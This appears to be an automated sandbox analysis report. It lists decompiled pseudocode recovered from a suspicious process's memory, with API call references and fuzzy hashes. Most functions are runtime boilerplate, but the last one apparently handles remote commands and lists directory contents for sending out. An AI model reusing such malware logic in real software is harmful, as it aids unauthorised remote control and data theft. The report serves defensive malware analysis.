                    				intOrPtr _v536;
                    				char _v540;
                    				intOrPtr _v544;
                    				intOrPtr _v548;
                    				intOrPtr _v552;
                    				intOrPtr _v556;
                    				intOrPtr _v560;
                    				intOrPtr _v564;
                    				intOrPtr _v568;
                    				intOrPtr _v572;
                    				intOrPtr _v576;
                    				intOrPtr _v580;
                    				intOrPtr _v584;
                    				char _v724;
                    				intOrPtr _v792;
                    				intOrPtr _v800;
                    				char _v804;
                    				struct _EXCEPTION_POINTERS _v812;
                    				signed int _t40;
                    				char* _t47;
                    				char* _t49;
                    				intOrPtr _t61;
                    				intOrPtr _t62;
                    				intOrPtr _t66;
                    				intOrPtr _t67;
                    				int _t68;
                    				intOrPtr _t69;
                    				signed int _t70;
                    
                    				_t69 = __esi;
                    				_t67 = __edi;
                    				_t66 = __edx;
                    				_t61 = __ebx;
                    				_t40 =  *0x46f00c; // 0x54ba778e
                    				_t41 = _t40 ^ _t70;
                    				_v8 = _t40 ^ _t70;
                    				if(_a4 != 0xffffffff) {
                    					_push(_a4);
                    					E0043349F(_t41);
                    					_pop(_t62);
                    				}
                    				E00435760(_t67,  &_v804, 0, 0x50);
                    				E00435760(_t67,  &_v724, 0, 0x2cc);
                    				_v812.ExceptionRecord =  &_v804;
                    				_t47 =  &_v724;
                    				_v812.ContextRecord = _t47;
                    				_v548 = _t47;
                    				_v552 = _t62;
                    				_v556 = _t66;
                    				_v560 = _t61;
                    				_v564 = _t69;
                    				_v568 = _t67;
                    				_v524 = ss;
                    				_v536 = cs;
                    				_v572 = ds;
                    				_v576 = es;
                    				_v580 = fs;
                    				_v584 = gs;
                    				asm("pushfd");
                    				_pop( *_t22);
                    				_v540 = _v0;
                    				_t49 =  &_v0;
                    				_v528 = _t49;
                    				_v724 = 0x10001;
                    				_v544 =  *((intOrPtr*)(_t49 - 4));
                    				_v804 = _a8;
                    				_v800 = _a12;
                    				_v792 = _v0;
                    				_t68 = IsDebuggerPresent();
                    				SetUnhandledExceptionFilter(0);
                    				if(UnhandledExceptionFilter( &_v812) == 0 && _t68 == 0 && _a4 != 0xffffffff) {
                    					_push(_a4);
                    					E0043349F(_t57);
                    				}
                    				return E004338BB(_v8 ^ _t70);
                    			}

                    APIs
                    • IsDebuggerPresent.KERNEL32 ref: 0043A4E9
                    • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0043A4F3
                    • UnhandledExceptionFilter.KERNEL32(?), ref: 0043A500
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: ExceptionFilterUnhandled$DebuggerPresent
                    • String ID:
                    • API String ID: 3906539128-0
                    • Opcode ID: 544a3ea7fff3e3fd303db8147e01e1c016785345ebc81d263e55c6614bc6e9fb
                    • Instruction ID: 1402d3c3d6381031a2721457eed26b4c58248f3cce99d36bfdd4232644ff5fa2
                    • Opcode Fuzzy Hash: 544a3ea7fff3e3fd303db8147e01e1c016785345ebc81d263e55c6614bc6e9fb
                    • Instruction Fuzzy Hash: 3031D37590132CABCB21DF24D88879DBBB8AF08315F5052EAE81CA7251E7749B858F49
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E00441B85(int _a4) {
                    				void* _t14;
                    				void* _t16;
                    
                    				if(E00447549(_t14, _t16) != 0 && ( *( *[fs:0x30] + 0x68) >> 0x00000008 & 0x00000001) == 0) {
                    					TerminateProcess(GetCurrentProcess(), _a4);
                    				}
                    				E00441C0A(_t14, _t16, _a4);
                    				ExitProcess(_a4);
                    			}

                    APIs
                    • GetCurrentProcess.KERNEL32(?,?,00441B5B,?), ref: 00441BA6
                    • TerminateProcess.KERNEL32(00000000,?,00441B5B,?), ref: 00441BAD
                    • ExitProcess.KERNEL32 ref: 00441BBF
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: Process$CurrentExitTerminate
                    • String ID:
                    • API String ID: 1703294689-0
                    • Opcode ID: ff5056bf36bedea9d2f3910c34989f8e11af6edf1d36431677989e12fa233f4a
                    • Instruction ID: 3981a427e79a20866ec782955a96dc1f6ef246171a4a80411b7f48c71aa59ebf
                    • Opcode Fuzzy Hash: ff5056bf36bedea9d2f3910c34989f8e11af6edf1d36431677989e12fa233f4a
                    • Instruction Fuzzy Hash: 18E0BF31005348ABDF116F65EE49E593B69EB44356F0040A5F8094A632DB39ED82CA88
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 86%
                    			E0043354D(intOrPtr __edx) {
                    				signed int _v8;
                    				signed int _v12;
                    				signed int _v16;
                    				signed int _v20;
                    				signed char _v24;
                    				signed int _v28;
                    				signed int _v32;
                    				signed int _v36;
                    				signed int _v40;
                    				signed int _v44;
                    				signed int _v48;
                    				signed int _t59;
                    				signed int _t62;
                    				signed int _t63;
                    				intOrPtr _t65;
                    				signed int _t66;
                    				signed int _t68;
                    				intOrPtr _t73;
                    				intOrPtr* _t75;
                    				intOrPtr* _t77;
                    				intOrPtr _t84;
                    				intOrPtr* _t86;
                    				signed int _t91;
                    				signed int _t94;
                    
                    				_t84 = __edx;
                    				 *0x46fd1c =  *0x46fd1c & 0x00000000;
                    				 *0x46f010 =  *0x46f010 | 1;
                    				if(IsProcessorFeaturePresent(0xa) == 0) {
                    					L20:
                    					return 0;
                    				}
                    				_v24 = _v24 & 0x00000000;
                    				 *0x46f010 =  *0x46f010 | 0x00000002;
                    				 *0x46fd1c = 1;
                    				_t86 =  &_v48;
                    				_push(1);
                    				asm("cpuid");
                    				_pop(_t73);
                    				 *_t86 = 0;
                    				 *((intOrPtr*)(_t86 + 4)) = 1;
                    				 *((intOrPtr*)(_t86 + 8)) = 0;
                    				 *((intOrPtr*)(_t86 + 0xc)) = _t84;
                    				_v16 = _v48;
                    				_v8 = _v36 ^ 0x49656e69;
                    				_v12 = _v40 ^ 0x6c65746e;
                    				_push(1);
                    				asm("cpuid");
                    				_t75 =  &_v48;
                    				 *_t75 = 1;
                    				 *((intOrPtr*)(_t75 + 4)) = _t73;
                    				 *((intOrPtr*)(_t75 + 8)) = 0;
                    				 *((intOrPtr*)(_t75 + 0xc)) = _t84;
                    				if((_v44 ^ 0x756e6547 | _v8 | _v12) != 0) {
                    					L9:
                    					_t91 =  *0x46fd20; // 0x2
                    					L10:
                    					_v32 = _v36;
                    					_t59 = _v40;
                    					_v8 = _t59;
                    					_v28 = _t59;
                    					if(_v16 >= 7) {
                    						_t65 = 7;
                    						_push(_t75);
                    						asm("cpuid");
                    						_t77 =  &_v48;
                    						 *_t77 = _t65;
                    						 *((intOrPtr*)(_t77 + 4)) = _t75;
                    						 *((intOrPtr*)(_t77 + 8)) = 0;
                    						 *((intOrPtr*)(_t77 + 0xc)) = _t84;
                    						_t66 = _v44;
                    						_v24 = _t66;
                    						_t59 = _v8;
                    						if((_t66 & 0x00000200) != 0) {
                    							 *0x46fd20 = _t91 | 0x00000002;
                    						}
                    					}
                    					if((_t59 & 0x00100000) != 0) {
                    						 *0x46f010 =  *0x46f010 | 0x00000004;
                    						 *0x46fd1c = 2;
                    						if((_t59 & 0x08000000) != 0 && (_t59 & 0x10000000) != 0) {
                    							asm("xgetbv");
                    							_v20 = _t59;
                    							_v16 = _t84;
                    							if((_v20 & 0x00000006) == 6 && 0 == 0) {
                    								_t62 =  *0x46f010; // 0x2f
                    								_t63 = _t62 | 0x00000008;
                    								 *0x46fd1c = 3;
                    								 *0x46f010 = _t63;
                    								if((_v24 & 0x00000020) != 0) {
                    									 *0x46fd1c = 5;
                    									 *0x46f010 = _t63 | 0x00000020;
                    								}
                    							}
                    						}
                    					}
                    					goto L20;
                    				}
                    				_t68 = _v48 & 0x0fff3ff0;
                    				if(_t68 == 0x106c0 || _t68 == 0x20660 || _t68 == 0x20670 || _t68 == 0x30650 || _t68 == 0x30660 || _t68 == 0x30670) {
                    					_t94 =  *0x46fd20; // 0x2
                    					_t91 = _t94 | 0x00000001;
                    					 *0x46fd20 = _t91;
                    					goto L10;
                    				} else {
                    					goto L9;
                    				}
                    			}

                    APIs
                    • IsProcessorFeaturePresent.KERNEL32(0000000A,00000000), ref: 00433566
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: FeaturePresentProcessor
                    • String ID: P@
                    • API String ID: 2325560087-676759640
                    • Opcode ID: 10d0db48ad41214a457a840dc0a8d4848e401eea1aef23fd8bf6dc7a295d9120
                    • Instruction ID: a2294149a4fe3e39a77fcac35e687f8d246c97dff2426aff95b936701e7ffbe2
                    • Opcode Fuzzy Hash: 10d0db48ad41214a457a840dc0a8d4848e401eea1aef23fd8bf6dc7a295d9120
                    • Instruction Fuzzy Hash: 02516B71D002089FEB24CFA9E98669EBBF4FB08315F14917AD455E7350E374AA04CFA5
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 72%
                    			E0044D0F9(void* __ebx, void* __ecx, void* __edi, void* __esi, intOrPtr* _a4, intOrPtr _a8, signed int _a12, intOrPtr _a16) {
                    				intOrPtr _v8;
                    				signed int _v12;
                    				intOrPtr* _v32;
                    				CHAR* _v36;
                    				signed int _v48;
                    				char _v286;
                    				signed int _v287;
                    				struct _WIN32_FIND_DATAA _v332;
                    				intOrPtr* _v336;
                    				signed int _v340;
                    				signed int _v344;
                    				intOrPtr _v372;
                    				signed int _t35;
                    				signed int _t40;
                    				signed int _t43;
                    				intOrPtr _t45;
                    				signed char _t47;
                    				intOrPtr* _t55;
                    				union _FINDEX_INFO_LEVELS _t57;
                    				signed int _t62;
                    				signed int _t65;
                    				void* _t72;
                    				void* _t74;
                    				signed int _t75;
                    				void* _t78;
                    				CHAR* _t79;
                    				intOrPtr* _t83;
                    				intOrPtr _t85;
                    				void* _t87;
                    				intOrPtr* _t88;
                    				signed int _t92;
                    				signed int _t96;
                    				void* _t101;
                    				intOrPtr _t102;
                    				signed int _t105;
                    				union _FINDEX_INFO_LEVELS _t106;
                    				void* _t111;
                    				intOrPtr _t112;
                    				void* _t113;
                    				signed int _t118;
                    				void* _t119;
                    				signed int _t120;
                    				void* _t121;
                    				void* _t122;
                    
                    				_push(__ecx);
                    				_t83 = _a4;
                    				_t2 = _t83 + 1; // 0x1
                    				_t101 = _t2;
                    				do {
                    					_t35 =  *_t83;
                    					_t83 = _t83 + 1;
                    				} while (_t35 != 0);
                    				_push(__edi);
                    				_t105 = _a12;
                    				_t85 = _t83 - _t101 + 1;
                    				_v8 = _t85;
                    				if(_t85 <= (_t35 | 0xffffffff) - _t105) {
                    					_push(__ebx);
                    					_push(__esi);
                    					_t5 = _t105 + 1; // 0x1
                    					_t78 = _t5 + _t85;
                    					_t111 = E004443F4(_t85, _t78, 1);
                    					_pop(_t87);
                    					__eflags = _t105;
                    					if(_t105 == 0) {
                    						L6:
                    						_push(_v8);
                    						_t78 = _t78 - _t105;
                    						_t40 = E00440303(_t87, _t111 + _t105, _t78, _a4);
                    						_t120 = _t119 + 0x10;
                    						__eflags = _t40;
                    						if(__eflags != 0) {
                    							goto L9;
                    						} else {
                    							_t72 = E0044D338(_a16, __eflags, _t111);
                    							E00445002(0);
                    							_t74 = _t72;
                    							goto L8;
                    						}
                    					} else {
                    						_push(_t105);
                    						_t75 = E00440303(_t87, _t111, _t78, _a8);
                    						_t120 = _t119 + 0x10;
                    						__eflags = _t75;
                    						if(_t75 != 0) {
                    							L9:
                    							_push(0);
                    							_push(0);
                    							_push(0);
                    							_push(0);
                    							_push(0);
                    							E0043A5E8();
                    							asm("int3");
                    							_t118 = _t120;
                    							_t121 = _t120 - 0x150;
                    							_t43 =  *0x46f00c; // 0x54ba778e
                    							_v48 = _t43 ^ _t118;
                    							_t88 = _v32;
                    							_push(_t78);
                    							_t79 = _v36;
                    							_push(_t111);
                    							_t112 = _v332.cAlternateFileName;
                    							_push(_t105);
                    							_v372 = _t112;
                    							while(1) {
                    								__eflags = _t88 - _t79;
                    								if(_t88 == _t79) {
                    									break;
                    								}
                    								_t45 =  *_t88;
                    								__eflags = _t45 - 0x2f;
                    								if(_t45 != 0x2f) {
                    									__eflags = _t45 - 0x5c;
                    									if(_t45 != 0x5c) {
                    										__eflags = _t45 - 0x3a;
                    										if(_t45 != 0x3a) {
                    											_t88 = E00454B80(_t79, _t88);
                    											continue;
                    										}
                    									}
                    								}
                    								break;
                    							}
                    							_t102 =  *_t88;
                    							__eflags = _t102 - 0x3a;
                    							if(_t102 != 0x3a) {
                    								L19:
                    								_t106 = 0;
                    								__eflags = _t102 - 0x2f;
                    								if(_t102 == 0x2f) {
                    									L23:
                    									_t47 = 1;
                    									__eflags = 1;
                    								} else {
                    									__eflags = _t102 - 0x5c;
                    									if(_t102 == 0x5c) {
                    										goto L23;
                    									} else {
                    										__eflags = _t102 - 0x3a;
                    										if(_t102 == 0x3a) {
                    											goto L23;
                    										} else {
                    											_t47 = 0;
                    										}
                    									}
                    								}
                    								_t90 = _t88 - _t79 + 1;
                    								asm("sbb eax, eax");
                    								_v340 =  ~(_t47 & 0x000000ff) & _t88 - _t79 + 0x00000001;
                    								E00435760(_t106,  &_v332, _t106, 0x140);
                    								_t122 = _t121 + 0xc;
                    								_t113 = FindFirstFileExA(_t79, _t106,  &_v332, _t106, _t106, _t106);
                    								_t55 = _v336;
                    								__eflags = _t113 - 0xffffffff;
                    								if(_t113 != 0xffffffff) {
                    									_t92 =  *((intOrPtr*)(_t55 + 4)) -  *_t55;
                    									__eflags = _t92;
                    									_t93 = _t92 >> 2;
                    									_v344 = _t92 >> 2;
                    									do {
                    										__eflags = _v332.cFileName - 0x2e;
                    										if(_v332.cFileName != 0x2e) {
                    											L36:
                    											_push(_t55);
                    											_t57 = E0044D0F9(_t79, _t93, _t106, _t113,  &(_v332.cFileName), _t79, _v340);
                    											_t122 = _t122 + 0x10;
                    											__eflags = _t57;
                    											if(_t57 != 0) {
                    												goto L26;
                    											} else {
                    												goto L37;
                    											}
                    										} else {
                    											_t93 = _v287;
                    											__eflags = _t93;
                    											if(_t93 == 0) {
                    												goto L37;
                    											} else {
                    												__eflags = _t93 - 0x2e;
                    												if(_t93 != 0x2e) {
                    													goto L36;
                    												} else {
                    													__eflags = _v286;
                    													if(_v286 == 0) {
                    														goto L37;
                    													} else {
                    														goto L36;
                    													}
                    												}
                    											}
                    										}
                    										goto L40;
                    										L37:
                    										_t62 = FindNextFileA(_t113,  &_v332);
                    										__eflags = _t62;
                    										_t55 = _v336;
                    									} while (_t62 != 0);
                    									_t103 =  *_t55;
                    									_t96 = _v344;
                    									_t65 =  *((intOrPtr*)(_t55 + 4)) -  *_t55 >> 2;
                    									__eflags = _t96 - _t65;
                    									if(_t96 != _t65) {
                    										E0043F8D0(_t79, _t106, _t113, _t103 + _t96 * 4, _t65 - _t96, 4, E0044CF51);
                    									}
                    								} else {
                    									_push(_t55);
                    									_t57 = E0044D0F9(_t79, _t90, _t106, _t113, _t79, _t106, _t106);
                    									L26:
                    									_t106 = _t57;
                    								}
                    								__eflags = _t113 - 0xffffffff;
                    								if(_t113 != 0xffffffff) {
                    									FindClose(_t113);
                    								}
                    							} else {
                    								__eflags = _t88 -  &(_t79[1]);
                    								if(_t88 ==  &(_t79[1])) {
                    									goto L19;
                    								} else {
                    									_push(_t112);
                    									E0044D0F9(_t79, _t88, 0, _t112, _t79, 0, 0);
                    								}
                    							}
                    							__eflags = _v12 ^ _t118;
                    							return E004338BB(_v12 ^ _t118);
                    						} else {
                    							goto L6;
                    						}
                    					}
                    				} else {
                    					_t74 = 0xc;
                    					L8:
                    					return _t74;
                    				}
                    				L40:
                    			}

                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID: .
                    • API String ID: 0-248832578
                    • Opcode ID: eb39091a66b90e585f9b8de1188895b1ce3c987d0d7c23a11321f6f6f58edeb2
                    • Instruction ID: a605d271e407c9958f5ebfb9e98191da8a3e066373b5453ef71e7620c58a5f30
                    • Opcode Fuzzy Hash: eb39091a66b90e585f9b8de1188895b1ce3c987d0d7c23a11321f6f6f58edeb2
                    • Instruction Fuzzy Hash: CA313571D00209AFEB249E79CC84EEB7BBDEB86308F1401AEF819D3251E6349D408B64
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 91%
                    			E0045081B(void* __ecx, void* __edx, signed int* _a4) {
                    				void* __ebx;
                    				void* __ebp;
                    				intOrPtr _t26;
                    				intOrPtr _t29;
                    				signed int _t32;
                    				signed char _t33;
                    				signed char _t34;
                    				void* _t36;
                    				intOrPtr* _t39;
                    				intOrPtr* _t42;
                    				signed int _t48;
                    				void* _t51;
                    				void* _t52;
                    				signed int* _t53;
                    				void* _t54;
                    				signed int _t62;
                    
                    				_t54 = E00446A95(_t36, __ecx, __edx);
                    				_t48 = 2;
                    				_t39 =  *((intOrPtr*)(_t54 + 0x50));
                    				_t51 = _t39 + 2;
                    				do {
                    					_t26 =  *_t39;
                    					_t39 = _t39 + _t48;
                    				} while (_t26 != 0);
                    				_t42 =  *((intOrPtr*)(_t54 + 0x54));
                    				 *(_t54 + 0x60) = 0 | _t39 - _t51 >> 0x00000001 == 0x00000003;
                    				_t52 = _t42 + 2;
                    				do {
                    					_t29 =  *_t42;
                    					_t42 = _t42 + _t48;
                    				} while (_t29 != 0);
                    				_t53 = _a4;
                    				 *(_t54 + 0x64) = 0 | _t42 - _t52 >> 0x00000001 == 0x00000003;
                    				_t53[1] = 0;
                    				if( *(_t54 + 0x60) == 0) {
                    					_t48 = E00450917( *((intOrPtr*)(_t54 + 0x50)));
                    				}
                    				 *(_t54 + 0x5c) = _t48;
                    				_t32 = EnumSystemLocalesW(E00450943, 1);
                    				_t62 =  *_t53 & 0x00000007;
                    				asm("bt ecx, 0x9");
                    				_t33 = _t32 & 0xffffff00 | _t62 > 0x00000000;
                    				asm("bt ecx, 0x8");
                    				_t34 = _t33 & 0xffffff00 | _t62 > 0x00000000;
                    				if((_t34 & (_t48 & 0xffffff00 | _t62 != 0x00000000) & _t33) == 0) {
                    					 *_t53 = 0;
                    					return _t34;
                    				}
                    				return _t34;
                    			}




















                    APIs
                      • Part of subcall function 00446A95: GetLastError.KERNEL32(00000020,?,004390F5,?,?,?,0043E278,?,?,00000020,00000000,?,?,?,0042C60C,0000003B), ref: 00446A99
                      • Part of subcall function 00446A95: _free.LIBCMT ref: 00446ACC
                      • Part of subcall function 00446A95: SetLastError.KERNEL32(00000000,0043E278,?,?,00000020,00000000,?,?,?,0042C60C,0000003B,?,00000041,00000000,00000000), ref: 00446B0D
                      • Part of subcall function 00446A95: _abort.LIBCMT ref: 00446B13
                    • EnumSystemLocalesW.KERNEL32(00450943,00000001,00000000,?,m3D,?,00450F70,00000000,?,?,?), ref: 0045088D
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: ErrorLast$EnumLocalesSystem_abort_free
                    • String ID: m3D
                    • API String ID: 1084509184-982802904
                    • Opcode ID: d13ce46db01857b44c754fc5ec7763bcb35d9ccf5c388861a977e99f0991b4a0
                    • Instruction ID: 15c25865bd57dd9ed052f6de1c9d4bc0c6d7c90143c64c40a76a96693f8e609e
                    • Opcode Fuzzy Hash: d13ce46db01857b44c754fc5ec7763bcb35d9ccf5c388861a977e99f0991b4a0
                    • Instruction Fuzzy Hash: 3E118C3B2007019FEB18AF39C8916BAB791FF80319B14883EED4647701D775B906C780
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E004508B6(void* __ecx, void* __edx, signed char* _a4) {
                    				void* __ebx;
                    				void* __ebp;
                    				intOrPtr _t11;
                    				signed int _t13;
                    				signed char* _t15;
                    				void* _t17;
                    				intOrPtr* _t20;
                    				intOrPtr _t25;
                    				void* _t26;
                    				void* _t27;
                    
                    				_t27 = E00446A95(_t17, __ecx, __edx);
                    				_t25 = 2;
                    				_t20 =  *((intOrPtr*)(_t27 + 0x50));
                    				_t26 = _t20 + 2;
                    				do {
                    					_t11 =  *_t20;
                    					_t20 = _t20 + _t25;
                    				} while (_t11 != 0);
                    				_t13 = 0 | _t20 - _t26 >> 0x00000001 == 0x00000003;
                    				 *(_t27 + 0x60) = _t13;
                    				if(_t13 == 0) {
                    					_t25 = E00450917( *((intOrPtr*)(_t27 + 0x50)));
                    				}
                    				 *((intOrPtr*)(_t27 + 0x5c)) = _t25;
                    				EnumSystemLocalesW(E00450B93, 1);
                    				_t15 = _a4;
                    				if(( *_t15 & 0x00000004) == 0) {
                    					 *_t15 = 0;
                    					return _t15;
                    				}
                    				return _t15;
                    			}














                    APIs
                      • Part of subcall function 00446A95: GetLastError.KERNEL32(00000020,?,004390F5,?,?,?,0043E278,?,?,00000020,00000000,?,?,?,0042C60C,0000003B), ref: 00446A99
                      • Part of subcall function 00446A95: _free.LIBCMT ref: 00446ACC
                      • Part of subcall function 00446A95: SetLastError.KERNEL32(00000000,0043E278,?,?,00000020,00000000,?,?,?,0042C60C,0000003B,?,00000041,00000000,00000000), ref: 00446B0D
                      • Part of subcall function 00446A95: _abort.LIBCMT ref: 00446B13
                    • EnumSystemLocalesW.KERNEL32(00450B93,00000001,?,?,m3D,?,00450F34,m3D,?,?,?,?,?,0044336D,?,?), ref: 00450902
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: ErrorLast$EnumLocalesSystem_abort_free
                    • String ID: m3D
                    • API String ID: 1084509184-982802904
                    • Opcode ID: 26991cba7bbc86e1919f10754b8b785b2ecdf25adbba73174a712f5d5bc6d13d
                    • Instruction ID: 5dea69f9d697fc4293d0711e1b08fce8c3201d78217ba2bcd737ffac06997e55
                    • Opcode Fuzzy Hash: 26991cba7bbc86e1919f10754b8b785b2ecdf25adbba73174a712f5d5bc6d13d
                    • Instruction Fuzzy Hash: A5F0283A3003055FDB146F359C81A66BB95EF81759F15883EFD418B642D675AC018744
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • GetLocaleInfoW.KERNEL32(00000000,00000002,00000000,?,20001004,?,20001004,?,00000002,?,?,00442DCB,?,00000004), ref: 004471C0
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: InfoLocale
                    • String ID: GetLocaleInfoEx
                    • API String ID: 2299586839-2904428671
                    • Opcode ID: 2c80f62870bc465dbeaf3c9209bb9ced0744fbcbc410adbe038e870c8c2fc236
                    • Instruction ID: 1399f742e217acd12c1245ecdfc534ed39672f07150ba9ee3c651a9906310cab
                    • Opcode Fuzzy Hash: 2c80f62870bc465dbeaf3c9209bb9ced0744fbcbc410adbe038e870c8c2fc236
                    • Instruction Fuzzy Hash: 3BF0F031A44208BBDB11AF61DC06F6E7F65EF08701F00406AFC0966292CB798E15DAAE
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 90%
                    			E00418650(char* __edx, void* __eflags, char _a8) {
                    				struct _WIN32_FIND_DATAW _v1028;
                    				char _v1036;
                    				char _v1064;
                    				char _v1088;
                    				void* _v1092;
                    				char _v1100;
                    				char _v1116;
                    				void* _v1120;
                    				char _v1128;
                    				char _v1136;
                    				char _v1152;
                    				char _v1156;
                    				char _v1160;
                    				void* _v1164;
                    				char _v1172;
                    				char _v1176;
                    				void* _v1188;
                    				char _v1196;
                    				void* _v1200;
                    				void* _v1204;
                    				char _v1208;
                    				char _v1220;
                    				char _v1224;
                    				char _v1228;
                    				char _v1232;
                    				char _v1236;
                    				char _v1240;
                    				char _v1252;
                    				void* __ebx;
                    				void* __esi;
                    				void* __ebp;
                    				intOrPtr* _t63;
                    				int _t85;
                    				int _t91;
                    				void* _t102;
                    				void* _t109;
                    				char* _t113;
                    				void* _t115;
                    				void* _t116;
                    				void* _t130;
                    				void* _t133;
                    				void* _t228;
                    				void* _t229;
                    				void* _t234;
                    				signed int _t235;
                    				void* _t238;
                    				void* _t239;
                    				void* _t240;
                    				void* _t243;
                    
                    				_t243 = __eflags;
                    				_t213 = __edx;
                    				_push(_t139);
                    				_t63 = E00401F8B( &_a8);
                    				E00404182( &_a8,  &_v1100, 4, 0xffffffff);
                    				_t238 = (_t235 & 0xfffffff8) - 0x4b4;
                    				E004020D6(_t139, _t238, __edx, _t243, 0x472ec8);
                    				_t239 = _t238 - 0x18;
                    				E004020D6(_t139, _t239, __edx, _t243,  &_v1116);
                    				E0041A976( &_v1252, _t213);
                    				_t240 = _t239 + 0x30;
                    				_t228 =  *_t63 - 0x19;
                    				if(_t228 == 0) {
                    					E004020BF(_t139,  &_v1220);
                    					_t213 = 0x473618;
                    					E004087F0( &_v1172, 0x473618, _t234, L"\\*");
                    					_t229 = FindFirstFileW(E00401EE4( &_v1172),  &_v1028);
                    					__eflags = _t229 - 0xffffffff;
                    					if(__eflags == 0) {
                    						L14:
                    						E004020D6(_t139, _t240 - 0x18, _t213, __eflags,  &_v1220);
                    						_push(0x5d);
                    						E00404A81(0x4737a0, _t213, __eflags);
                    						E00401EE9();
                    						E00401FB8();
                    						goto L15;
                    					}
                    					E0040415E(_t139,  &_v1196, 0x473618, _t234,  &(_v1028.cFileName));
                    					_t213 = 0x4644f0;
                    					_t85 = E00406E2B(__eflags);
                    					_t139 = _t85;
                    					E00401EE9();
                    					__eflags = _t85;
                    					if(__eflags != 0) {
                    						E00401FC2( &_v1228, 0x4644f0, _t229, E00402097(_t139,  &_v1196, 0x4644f0, _t234, __eflags,  &_v1028, 0x250));
                    						E00401FB8();
                    					}
                    					while(1) {
                    						__eflags = FindNextFileW(_t229,  &_v1028);
                    						if(__eflags == 0) {
                    							goto L14;
                    						}
                    						E0040415E(_t139,  &_v1196, _t213, _t234,  &(_v1028.cFileName));
                    						_t213 = L"..";
                    						_t91 = E00406E2B(__eflags);
                    						_t139 = _t91;
                    						E00401EE9();
                    						__eflags = _t91;
                    						if(__eflags != 0) {
                    							L00403356(E00402097(_t139,  &_v1196, L"..", _t234, __eflags,  &_v1028, 0x250));
                    							E00401FB8();
                    						}
                    					}
                    					goto L14;
                    				} else {
                    					_t245 = _t228 == 1;
                    					if(_t228 == 1) {
                    						_t102 = E0041A7B9( &_v1152, E00401E45( &_v1232, _t213, _t234, _t245, 1));
                    						E00402F85( &_v1176, E004087F0( &_v1128, 0x473618, _t234, "\\"), _t102);
                    						E00401EE9();
                    						E00401EE9();
                    						E004020BF(_t139,  &_v1224);
                    						E00401EE4( &_v1176);
                    						_t213 =  &_v1224;
                    						_t109 = E0041ADFE( &_v1224);
                    						_t246 = _t109;
                    						if(_t109 != 0) {
                    							_t113 = E00401F8B(E00401E45(0x473298,  &_v1224, _t234, _t246, 0x1b));
                    							_t247 =  *_t113 - 1;
                    							if( *_t113 == 1) {
                    								_t130 = E0040245C();
                    								E0040632B( &_v1028, E00401F8B(0x473280), _t130);
                    								_t133 = E0040245C();
                    								E00401FC2( &_v1240, _t213, 0x473280, E0040644C(_t139,  &_v1036, _t213,  &_v1156, E00401F8B( &_v1228), _t133));
                    								E00401FB8();
                    							}
                    							_t115 = E00401E45( &_v1232, _t213, _t234, _t247, 2);
                    							_t116 = E00401E45( &_v1236, _t213, _t234, _t247, 0);
                    							_t213 = E00402EF0(_t139,  &_v1160, E00402EF0(_t139,  &_v1136, E00402EF0(_t139,  &_v1088, E00402EF0(_t139,  &_v1064, E00402F11( &_v1208, E00401E45( &_v1240, _t213, _t234, _t247, 1), _t234, 0x472ec8), _t234, _t247, _t116), _t234, _t247, 0x472ec8), _t234, _t247, _t115), _t234, _t247, 0x472ec8);
                    							E00402EF0(_t139, _t240 - 0x18, _t122, _t234, _t247,  &_v1220);
                    							_push(0x5e);
                    							E00404A81(0x4737a0, _t122, _t247);
                    							E00401FB8();
                    							E00401FB8();
                    							E00401FB8();
                    							E00401FB8();
                    							E00401FB8();
                    						}
                    						E00401FB8();
                    						E00401EE9();
                    					}
                    					L15:
                    					E00401E6D( &_v1232, _t213);
                    					E00401FB8();
                    					return E00401FB8();
                    				}
                    			}





















































                    APIs
                    • FindFirstFileW.KERNEL32(00000000,?), ref: 004188A6
                    • FindNextFileW.KERNEL32(00000000,?,?), ref: 00418972
